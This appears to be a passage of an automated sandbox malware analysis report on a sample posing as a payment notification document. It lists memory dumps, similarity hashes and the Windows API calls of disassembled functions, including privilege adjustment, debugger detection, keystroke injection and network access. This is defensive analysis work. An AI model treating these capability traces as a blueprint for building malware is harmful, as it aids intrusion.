                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                              • String ID: *.*
                                                                              • API String ID: 1972594611-438819550
                                                                              • Opcode ID: 9a2e0c08b80bd652473f935b281d304dcfb07facce52f5348ecdd65b50f1eaa1
                                                                              • Instruction ID: da41799bfb3761c644eb4cc00647eccc42db7be7fe6a5127264690f42e931ae1
                                                                              • Opcode Fuzzy Hash: 9a2e0c08b80bd652473f935b281d304dcfb07facce52f5348ecdd65b50f1eaa1
                                                                              • Instruction Fuzzy Hash: D5416171904209EFDF14DF69D845AEE7BB8FF45311F244055E859A2191EB309E88CF61
                                                                              APIs
                                                                                • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008F9A4E
                                                                              • GetSysColor.USER32(0000000F), ref: 008F9B23
                                                                              • SetBkColor.GDI32(?,00000000), ref: 008F9B36
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Color$LongProcWindow
                                                                              • String ID:
                                                                              • API String ID: 3131106179-0
                                                                              • Opcode ID: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
                                                                              • Instruction ID: 185dcce16e73c945b18d357ce0ed348f1656c8f42806b889ff3ae6678cf2ad94
                                                                              • Opcode Fuzzy Hash: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
                                                                              • Instruction Fuzzy Hash: CDA17EB120846CBEE738AA7C8C99F7B769DFB82314F10420AF692C65D1CA259D01D772
                                                                              APIs
                                                                                • Part of subcall function 0096304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0096307A
                                                                                • Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B
                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0096185D
                                                                              • WSAGetLastError.WSOCK32 ref: 00961884
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 009618DB
                                                                              • WSAGetLastError.WSOCK32 ref: 009618E6
                                                                              • closesocket.WSOCK32(00000000), ref: 00961915
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 1601658205-0
                                                                              • Opcode ID: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
                                                                              • Instruction ID: d576f579b0559731347e49a84c047e6a268ca066fcebb58b433076656211d455
                                                                              • Opcode Fuzzy Hash: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
                                                                              • Instruction Fuzzy Hash: 7351B471A002109FD710AF28D886F6A77E5EB45718F08845CF9159F3D3D771AD418BA2
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
                                                                              • Instruction ID: 1099ca8f3b023b9deb96a187eb01e3907d5c33e0b4197ea5089b15127acedff7
                                                                              • Opcode Fuzzy Hash: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
                                                                              • Instruction Fuzzy Hash: 3121A0327402015FD7218F5EC884B2A7BA9EF85314B1DC05CE88E8B251CB71EC42CB90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                              • API String ID: 0-1546025612
                                                                              • Opcode ID: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
                                                                              • Instruction ID: d19d6072b94765976761d67efeb42b7dd0171dfa60d026fcc80dc0e985ab7338
                                                                              • Opcode Fuzzy Hash: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
                                                                              • Instruction Fuzzy Hash: 92A28E70A0066ACBDF24CF59D8407ADB7B1FF55314F2585AAE819E7688EB309D81CF90
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0096A6AC
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0096A6BA
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0096A79C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0096A7AB
                                                                                • Part of subcall function 008FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00923303,?), ref: 008FCE8A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                              • String ID:
                                                                              • API String ID: 1991900642-0
                                                                              • Opcode ID: 6766e0151d75e065f4cc14cbae666d00c0f54f86e1ebe610bd322365b84ba284
                                                                              • Instruction ID: 7562f496b1162d0873a415d915f774c36f8a2cfa4a8a05c91eb3de89ba27c70a
                                                                              • Opcode Fuzzy Hash: 6766e0151d75e065f4cc14cbae666d00c0f54f86e1ebe610bd322365b84ba284
                                                                              • Instruction Fuzzy Hash: 06514C715083409FD710EF29C886A6BBBE8FF89754F40492DF595D7262EB70E904CB92
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0094AAAC
                                                                              • SetKeyboardState.USER32(00000080), ref: 0094AAC8
                                                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0094AB36
                                                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0094AB88
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
                                                                              • Instruction ID: 66d935ca39955cef175ce32ef6234f70da8a01855a0be217a1438870dafeb9cf
                                                                              • Opcode Fuzzy Hash: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
                                                                              • Instruction Fuzzy Hash: 0F312470AC0208AEFF35CB65CC05FFA7BAAEB94320F04421BF585961D0D3798981D7A2
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0091BB7F
                                                                                • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                                • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                              • GetTimeZoneInformation.KERNEL32 ref: 0091BB91
                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC09
                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,009B1270,000000FF,?,0000003F,?,?,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC36
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                              • String ID:
                                                                              • API String ID: 806657224-0
                                                                              • Opcode ID: 042cb60ee7de8d446ba4f0a3fed00a07f7e56b8ad23212796f44524f084214db
                                                                              • Instruction ID: 6008b0b5ae8d4cf44f98fa534432929cf273591406ee546fcc782106a8db76e2
                                                                              • Opcode Fuzzy Hash: 042cb60ee7de8d446ba4f0a3fed00a07f7e56b8ad23212796f44524f084214db
                                                                              • Instruction Fuzzy Hash: 96310471A08209DFCB15DF68CD909ADBBB9FF4532075442AEE060DB2B1C7309D81DB90
                                                                              APIs
                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 0095CE89
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0095CEEA
                                                                              • SetEvent.KERNEL32(?,?,00000000), ref: 0095CEFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorEventFileInternetLastRead
                                                                              • String ID:
                                                                              • API String ID: 234945975-0
                                                                              • Opcode ID: a84ed2004e20a59941296ccf2b3c434f02edc70d46e23e55c6a2423b0566e86e
                                                                              • Instruction ID: c0c4754162854fc463e0b5bfa9fa1a6b6c5466caaf02e5ecc5f3420215e30570
                                                                              • Opcode Fuzzy Hash: a84ed2004e20a59941296ccf2b3c434f02edc70d46e23e55c6a2423b0566e86e
                                                                              • Instruction Fuzzy Hash: 6821BDB25043059FEB20CFA6C949BA677FCEB40319F10481EE946A2151E774EE489B90
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,00925222), ref: 0094DBCE
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0094DBDD
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0094DBEE
                                                                              • FindClose.KERNEL32(00000000), ref: 0094DBFA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                              • String ID:
                                                                              • API String ID: 2695905019-0
                                                                              • Opcode ID: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
                                                                              • Instruction ID: ea371f120befd5f862a0426e6c7c35ae878b0ae6b200ab34c321be242d06b6e7
                                                                              • Opcode Fuzzy Hash: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
                                                                              • Instruction Fuzzy Hash: BCF023714295105782216FBCDC4DC6A376C9F02339B504716F479C10F0EBB09DD4D6D5
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009482AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: ($|
                                                                              • API String ID: 1659193697-1631851259
                                                                              • Opcode ID: 32159dee1923542b5d520e02669b0de6ff657e97534708fe31348c625c4c561f
                                                                              • Instruction ID: a2e3816d629df1e6f842c6aad02c7b418559d503b2ea0eda23cff3e9fa64090d
                                                                              • Opcode Fuzzy Hash: 32159dee1923542b5d520e02669b0de6ff657e97534708fe31348c625c4c561f
                                                                              • Instruction Fuzzy Hash: 6E322575A006059FCB28CF69C481E6AB7F0FF48710B15C56EE59ADB3A1EB70E981CB40
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00955CC1
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00955D17
                                                                              • FindClose.KERNEL32(?), ref: 00955D5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: b14190d7bad50afa07549af2ceb5ce492f269d0bfe9dff81e0e93712a8ab34c6
                                                                              • Instruction ID: 86bba7d07dcde8b8b90e7d7c232b3f298d4ea98b6305ca73fa47acac4df32052
                                                                              • Opcode Fuzzy Hash: b14190d7bad50afa07549af2ceb5ce492f269d0bfe9dff81e0e93712a8ab34c6
                                                                              • Instruction Fuzzy Hash: F9519B756046019FC714CF29C494A9AB7F8FF4A314F15855DE9AA8B3A2CB30ED44CF91
                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32 ref: 0091271A
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00912724
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00912731
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: dd5c31487a5bfb75f4abbbdd3390c13b084206c2ce89b6c4916ad9dbf48cda69
                                                                              • Instruction ID: a7dc8760a7b091a609ae777034975cdf38bcbf189a3dca0958cc46c67074b407
                                                                              • Opcode Fuzzy Hash: dd5c31487a5bfb75f4abbbdd3390c13b084206c2ce89b6c4916ad9dbf48cda69
                                                                              • Instruction Fuzzy Hash: 9031D67591121C9BCB21DF68DD897DDB7B8AF48310F5041EAE41CA72A1E7309F818F45
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009551DA
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00955238
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 009552A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: 7889572ceb5f94e0757af5aff91b024b327d6f6958d0ae135e4da532d9ec1c42
                                                                              • Instruction ID: aadfac842077c3ba5f9de72d81832b51ceeba0ce026606d65a5ef21f65e65096
                                                                              • Opcode Fuzzy Hash: 7889572ceb5f94e0757af5aff91b024b327d6f6958d0ae135e4da532d9ec1c42
                                                                              • Instruction Fuzzy Hash: E031BF75A00508DFDB00DF55D884EADBBB4FF09314F0580A9E809AB362DB31EC4ACB91
                                                                              APIs
                                                                                • Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900668
                                                                                • Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900685
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                              • GetLastError.KERNEL32 ref: 0094174A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                              • String ID:
                                                                              • API String ID: 577356006-0
                                                                              • Opcode ID: 20b1cbda3203933b8b46cd8978ad2b0c967c3b90138a158afd8ea85526c4b380
                                                                              • Instruction ID: 5c19acca6426fd6cf09292c5e5a6ff5af7636cda3ef0f72dbca69bbf2277a4d1
                                                                              • Opcode Fuzzy Hash: 20b1cbda3203933b8b46cd8978ad2b0c967c3b90138a158afd8ea85526c4b380
                                                                              • Instruction Fuzzy Hash: 4D11CEB2414309AFE718AF64DC86D6AB7BDFF04714B20852EE15693241EB70FC818B60
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D608
                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0094D645
                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D650
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 33631002-0
                                                                              • Opcode ID: abd04d0c6bb03b80130b6e13ac1651b0a4cdfb2c0b8d7771b18cfb7db9e820e5
                                                                              • Instruction ID: 811e3f5748f1608a3eb34b712a33fcad2c2b6e6ae3286c3a9aedbbd160ceeb62
                                                                              • Opcode Fuzzy Hash: abd04d0c6bb03b80130b6e13ac1651b0a4cdfb2c0b8d7771b18cfb7db9e820e5
                                                                              • Instruction Fuzzy Hash: 7511A1B6E05228BFDB108F98DC44FAFBFBCEB45B50F108125F908E7290C2704A018BA1
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0094168C
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009416A1
                                                                              • FreeSid.ADVAPI32(?), ref: 009416B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
